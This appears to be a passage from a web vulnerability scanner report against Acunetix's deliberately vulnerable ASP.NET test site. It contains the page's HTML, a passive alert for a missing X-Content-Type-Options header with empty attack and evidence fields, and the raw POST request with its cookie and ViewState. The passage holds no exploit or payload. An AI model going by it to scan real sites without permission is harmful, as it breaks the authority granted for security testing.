value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyY2RkZNGFyTb9L/R3K+NgG4eTH6G64d5v" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKblqunCgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBEMuJR47/37fBoWsDm+8pRHDKDZX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Content-Length: 6529 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,529 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgM